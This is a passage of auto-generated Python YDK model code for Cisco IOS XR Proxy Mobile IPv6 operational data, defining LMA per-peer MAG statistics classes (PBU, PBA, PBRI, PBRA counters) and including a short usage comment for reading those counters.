self._perform_setattr(Pmipv6.Lma.Statistics.Global.AccountingStatistics, ['accounting_start_sent_count', 'accounting_update_sent_count', 'accounting_stop_sent_count'], name, value)
class MagStatistics(Entity):
"""
Table of MAGStatistics
.. attribute:: mag_statistic
Peer MAG statistics
**type**\: list of :py:class:`MagStatistic <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics, self).__init__()
self.yang_name = "mag-statistics"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("mag-statistic", ("mag_statistic", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic))])
self._leafs = OrderedDict()
self.mag_statistic = YList(self)
self._segment_path = lambda: "mag-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics, [], name, value)
class MagStatistic(Entity):
"""
Peer MAG statistics
.. attribute:: mag_name (key)
Peer MAG Name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: protocol_statistics
LMA Protocol Statistics
**type**\: :py:class:`ProtocolStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics>`
.. attribute:: lma_identifier
LMA Identifier
**type**\: str
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic, self).__init__()
self.yang_name = "mag-statistic"
self.yang_parent_name = "mag-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['mag_name']
self._child_classes = OrderedDict([("protocol-statistics", ("protocol_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics))])
self._leafs = OrderedDict([
('mag_name', (YLeaf(YType.str, 'mag-name'), ['str'])),
('lma_identifier', (YLeaf(YType.str, 'lma-identifier'), ['str'])),
])
self.mag_name = None
self.lma_identifier = None
self.protocol_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics()
self.protocol_statistics.parent = self
self._children_name_map["protocol_statistics"] = "protocol-statistics"
self._segment_path = lambda: "mag-statistic" + "[mag-name='" + str(self.mag_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/mag-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic, ['mag_name', 'lma_identifier'], name, value)
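# --- Illustrative usage (not part of the generated model) -------------------
# Each peer MAG appears as one keyed entry (key: mag_name) in the
# mag-statistics list. A minimal sketch, assuming a `pmipv6` object already
# read as in the earlier example, of walking the YList and reporting per-peer
# counters from the nested protocol-statistics container defined below:
#
#     for mag in pmipv6.lma.statistics.mag_statistics.mag_statistic:
#         proto = mag.protocol_statistics
#         print(mag.mag_name,
#               proto.pbu_receive_statistics.pbu_count,
#               proto.pba_send_statistics.pba_count)
# -----------------------------------------------------------------------------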
class ProtocolStatistics(Entity):
"""
LMA Protocol Statistics
.. attribute:: pbu_receive_statistics
PBU Receive Statistics
**type**\: :py:class:`PbuReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics>`
.. attribute:: pba_send_statistics
PBA Send Statistics
**type**\: :py:class:`PbaSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics>`
.. attribute:: pbri_send_statistics
PBRI Send Statistics
**type**\: :py:class:`PbriSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics>`
.. attribute:: pbri_receive_statistics
PBRI Receive Statistics
**type**\: :py:class:`PbriReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics>`
.. attribute:: pbra_send_statistics
PBRA Send Statistics
**type**\: :py:class:`PbraSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics>`
.. attribute:: pbra_receive_statistics
PBRA Receive Statistics
**type**\: :py:class:`PbraReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics, self).__init__()
self.yang_name = "protocol-statistics"
self.yang_parent_name = "mag-statistic"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("pbu-receive-statistics", ("pbu_receive_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics)), ("pba-send-statistics", ("pba_send_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics)), ("pbri-send-statistics", ("pbri_send_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics)), ("pbri-receive-statistics", ("pbri_receive_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics)), ("pbra-send-statistics", ("pbra_send_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics)), ("pbra-receive-statistics", ("pbra_receive_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics))])
self._leafs = OrderedDict()
self.pbu_receive_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics()
self.pbu_receive_statistics.parent = self
self._children_name_map["pbu_receive_statistics"] = "pbu-receive-statistics"
self.pba_send_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics()
self.pba_send_statistics.parent = self
self._children_name_map["pba_send_statistics"] = "pba-send-statistics"
self.pbri_send_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics()
self.pbri_send_statistics.parent = self
self._children_name_map["pbri_send_statistics"] = "pbri-send-statistics"
self.pbri_receive_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics()
self.pbri_receive_statistics.parent = self
self._children_name_map["pbri_receive_statistics"] = "pbri-receive-statistics"
self.pbra_send_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics()
self.pbra_send_statistics.parent = self
self._children_name_map["pbra_send_statistics"] = "pbra-send-statistics"
self.pbra_receive_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics()
self.pbra_receive_statistics.parent = self
self._children_name_map["pbra_receive_statistics"] = "pbra-receive-statistics"
self._segment_path = lambda: "protocol-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics, [], name, value)
class PbuReceiveStatistics(Entity):
"""
PBU Receive Statistics
.. attribute:: pbu_count
Count of PBUs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbu_drop_count
Count of PBUs Dropped
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics, self).__init__()
self.yang_name = "pbu-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbu_count', (YLeaf(YType.uint64, 'pbu-count'), ['int'])),
('pbu_drop_count', (YLeaf(YType.uint32, 'pbu-drop-count'), ['int'])),
])
self.pbu_count = None
self.pbu_drop_count = None
self._segment_path = lambda: "pbu-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics, ['pbu_count', 'pbu_drop_count'], name, value)
class PbaSendStatistics(Entity):
"""
PBA Send Statistics
.. attribute:: pba_count
Count of PBAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pba_drop_count
Count of PBAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: accepted_count
Count of Status Code \- Binding Update accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_count
Count of Status Code \- Last BA status code sent
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_failure_count
Count of Status Code \- Reason unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_failure_count
Count of Status Code \- Administratively prohibited
**type**\: int
**range:** 0..4294967295
.. attribute:: resource_failure_count
Count of Status Code \- Insufficient resources
**type**\: int
**range:** 0..4294967295
.. attribute:: home_reg_failure_count
Count of Status Code \- Home registration not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: home_subnet_failure_count
Count of Status Code \- Not home subnet
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_sequence_failure_count
Count of Status Code \- Sequence number out of window
**type**\: int
**range:** 0..4294967295
.. attribute:: reg_type_failure_count
Count of Status Code \- Registration type change
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_failure_count
Count of Status Code \- Auth Fail
**type**\: int
**range:** 0..4294967295
.. attribute:: proxy_reg_not_enabled_count
Count of Status Code \- Proxy Registration not enabled
**type**\: int
**range:** 0..4294967295
.. attribute:: not_lma_for_this_mn_count
Count of Status Code \- Not LMA for this Mobile Node
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_proxy_reg_count
Count of Status Code \- MAG not authorized for proxy registration
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_hnp_count
Count of Status Code \- Not authorized for HNP
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_mismatch_count
Count of Status Code \- Invalid timestamp value
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_lower_than_previous_accepted_count
Count of Status Code \- Timestamp lower than previous accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hnp_opt_count
Count of Status Code \- Missing Home Network Prefix option
**type**\: int
**range:** 0..4294967295
.. attribute:: received_hnps_do_not_match_bce_hnps_count
Count of Status Code \- Received HNPs do not match BCE HNPs
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_mn_id_opt_count
Count of Status Code \- Missing MN identifier option
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hi_opt_count
Count of Status Code \- Missing Handoff Indicator
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_access_tech_type_opt_count
Count of Status Code \- Missing ATT option
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_mobility_count
Count of Status Code \- Not authorized for IPv4 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_hoa_count
Count of Status Code \- Not authorized for IPv4 HoA
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv6_mobility_count
Count of Status Code \- Not authorized for IPv6 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: multiple_ipv4_ho_a_not_supported_count
Count of Status Code \- Multiple IPv4 HoA not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: gre_key_opt_required_count
Count of Status Code \- GRE Key option is required
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics, self).__init__()
self.yang_name = "pba-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pba_count', (YLeaf(YType.uint64, 'pba-count'), ['int'])),
('pba_drop_count', (YLeaf(YType.uint32, 'pba-drop-count'), ['int'])),
('accepted_count', (YLeaf(YType.uint32, 'accepted-count'), ['int'])),
('unknown_count', (YLeaf(YType.uint32, 'unknown-count'), ['int'])),
('unspecified_failure_count', (YLeaf(YType.uint32, 'unspecified-failure-count'), ['int'])),
('admin_failure_count', (YLeaf(YType.uint32, 'admin-failure-count'), ['int'])),
('resource_failure_count', (YLeaf(YType.uint32, 'resource-failure-count'), ['int'])),
('home_reg_failure_count', (YLeaf(YType.uint32, 'home-reg-failure-count'), ['int'])),
('home_subnet_failure_count', (YLeaf(YType.uint32, 'home-subnet-failure-count'), ['int'])),
('bad_sequence_failure_count', (YLeaf(YType.uint32, 'bad-sequence-failure-count'), ['int'])),
('reg_type_failure_count', (YLeaf(YType.uint32, 'reg-type-failure-count'), ['int'])),
('authen_failure_count', (YLeaf(YType.uint32, 'authen-failure-count'), ['int'])),
('proxy_reg_not_enabled_count', (YLeaf(YType.uint32, 'proxy-reg-not-enabled-count'), ['int'])),
('not_lma_for_this_mn_count', (YLeaf(YType.uint32, 'not-lma-for-this-mn-count'), ['int'])),
('no_author_for_proxy_reg_count', (YLeaf(YType.uint32, 'no-author-for-proxy-reg-count'), ['int'])),
('no_author_for_hnp_count', (YLeaf(YType.uint32, 'no-author-for-hnp-count'), ['int'])),
('timestamp_mismatch_count', (YLeaf(YType.uint32, 'timestamp-mismatch-count'), ['int'])),
('timestamp_lower_than_previous_accepted_count', (YLeaf(YType.uint32, 'timestamp-lower-than-previous-accepted-count'), ['int'])),
('missing_hnp_opt_count', (YLeaf(YType.uint32, 'missing-hnp-opt-count'), ['int'])),
('received_hnps_do_not_match_bce_hnps_count', (YLeaf(YType.uint32, 'received-hnps-do-not-match-bce-hnps-count'), ['int'])),
('missing_mn_id_opt_count', (YLeaf(YType.uint32, 'missing-mn-id-opt-count'), ['int'])),
('missing_hi_opt_count', (YLeaf(YType.uint32, 'missing-hi-opt-count'), ['int'])),
('missing_access_tech_type_opt_count', (YLeaf(YType.uint32, 'missing-access-tech-type-opt-count'), ['int'])),
('no_author_for_ipv4_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-mobility-count'), ['int'])),
('no_author_for_ipv4_hoa_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-hoa-count'), ['int'])),
('no_author_for_ipv6_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv6-mobility-count'), ['int'])),
('multiple_ipv4_ho_a_not_supported_count', (YLeaf(YType.uint32, 'multiple-ipv4-ho-a-not-supported-count'), ['int'])),
('gre_key_opt_required_count', (YLeaf(YType.uint32, 'gre-key-opt-required-count'), ['int'])),
])
self.pba_count = None
self.pba_drop_count = None
self.accepted_count = None
self.unknown_count = None
self.unspecified_failure_count = None
self.admin_failure_count = None
self.resource_failure_count = None
self.home_reg_failure_count = None
self.home_subnet_failure_count = None
self.bad_sequence_failure_count = None
self.reg_type_failure_count = None
self.authen_failure_count = None
self.proxy_reg_not_enabled_count = None
self.not_lma_for_this_mn_count = None
self.no_author_for_proxy_reg_count = None
self.no_author_for_hnp_count = None
self.timestamp_mismatch_count = None
self.timestamp_lower_than_previous_accepted_count = None
self.missing_hnp_opt_count = None
self.received_hnps_do_not_match_bce_hnps_count = None
self.missing_mn_id_opt_count = None
self.missing_hi_opt_count = None
self.missing_access_tech_type_opt_count = None
self.no_author_for_ipv4_mobility_count = None
self.no_author_for_ipv4_hoa_count = None
self.no_author_for_ipv6_mobility_count = None
self.multiple_ipv4_ho_a_not_supported_count = None
self.gre_key_opt_required_count = None
self._segment_path = lambda: "pba-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics, ['pba_count', 'pba_drop_count', 'accepted_count', 'unknown_count', 'unspecified_failure_count', 'admin_failure_count', 'resource_failure_count', 'home_reg_failure_count', 'home_subnet_failure_count', 'bad_sequence_failure_count', 'reg_type_failure_count', 'authen_failure_count', 'proxy_reg_not_enabled_count', 'not_lma_for_this_mn_count', 'no_author_for_proxy_reg_count', 'no_author_for_hnp_count', 'timestamp_mismatch_count', 'timestamp_lower_than_previous_accepted_count', 'missing_hnp_opt_count', 'received_hnps_do_not_match_bce_hnps_count', 'missing_mn_id_opt_count', 'missing_hi_opt_count', 'missing_access_tech_type_opt_count', 'no_author_for_ipv4_mobility_count', 'no_author_for_ipv4_hoa_count', 'no_author_for_ipv6_mobility_count', 'multiple_ipv4_ho_a_not_supported_count', 'gre_key_opt_required_count'], name, value)
class PbriSendStatistics(Entity):
"""
PBRI Send Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User\-Initiated Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics, self).__init__()
self.yang_name = "pbri-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbriReceiveStatistics(Entity):
"""
PBRI Receive Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User\-Initiated Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics, self).__init__()
self.yang_name = "pbri-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbraSendStatistics(Entity):
"""
PBRA Send Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics, self).__init__()
self.yang_name = "pbra-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class PbraReceiveStatistics(Entity):
"""
PBRA Receive Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
